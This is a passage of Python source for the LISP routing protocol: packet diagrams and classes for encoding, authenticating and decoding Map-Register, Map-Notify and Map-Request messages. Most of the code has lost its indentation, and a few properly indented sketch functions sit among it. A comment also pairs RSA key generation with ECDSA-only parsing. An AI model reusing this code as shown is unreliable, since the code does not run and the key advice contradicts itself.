self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid is one of 8 values that describes the encryption key-id used for
# encrypting Map-Register messages. When the Map-Register is encrypted,
# the entire message, not including the first 4 bytes, is chacha20
# encrypted. The e-bit must be set by the ETR to indicate that the
# Map-Register was encrypted.
#
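#
# A minimal sketch (illustrative only, not referenced elsewhere in this
# file) mirroring how decode() below extracts the e-bit and encryption
# key-id from the first long of a Map-Register:
#
def lisp_map_register_crypto_bits_example(first_long):
    encrypt_bit = True if (first_long & 0x2000) else False
    key_id = (first_long >> 14) & 0x7 if encrypt_bit else None
    return([encrypt_bit, key_id])
#enddef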
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute the hash later.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return(False)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
#
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
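#
# Illustrative sketch of the authentication flow that encode()/decode()
# above implement: zero the auth field, run a keyed hash over the entire
# message, then splice the digest back into place. HMAC-SHA1 is assumed
# here purely for the example (the real digest choice is made from alg-id
# by lisp_hash_me()); 'packet' and 'password' are byte strings, and for a
# Map-Notify the auth data starts at offset 16 (4-byte first long, 8-byte
# nonce, then key-id/alg-id/auth-len).
#
def lisp_example_splice_auth(packet, password, offset, auth_len):
    import hashlib
    import hmac

    zeroed = packet[:offset] + b"\x00" * auth_len + packet[offset+auth_len:]
    digest = hmac.new(password, zeroed, hashlib.sha1).digest()[:auth_len]
    return(packet[:offset] + digest + packet[offset+auth_len:])
#enddef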
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in the file. Note
# that the ecdsa package only parses ECDSA PEM keys, so the key-pair must
# be an EC one for from_pem() to accept it.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
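#
# Minimal sketch of the signing scheme described above, mirroring the
# "nonce + source-eid + target-eid" string that sign_map_request() and
# verify_map_request_sig() operate on. The in-process key-pair and the
# literal EID strings are for illustration only; the class below reads
# PEM files instead, and since it parses them with the ecdsa package the
# key-pair must be an ECDSA one.
#
def lisp_example_sign_and_verify():
    import binascii
    import ecdsa

    privkey = ecdsa.SigningKey.generate(curve=ecdsa.NIST256p)
    pubkey = privkey.get_verifying_key()

    sig_data = "0xdeadbeefdeadbeef" + "2001:db8::1" + "2001:db8::99"
    signature = privkey.sign(sig_data.encode())

    sig = binascii.b2a_base64(signature)        # this goes in the JSON
    return(pubkey.verify(binascii.a2b_base64(sig), sig_data.encode()))
#enddef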
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
lprint(" itr-rloc: afi {} {}{}".format(itr.afi,
red(itr.print_address_no_iid(), False),
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet += struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
lcaf_len, json_len)
packet += json_string
packet += struct.pack("H", 0)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
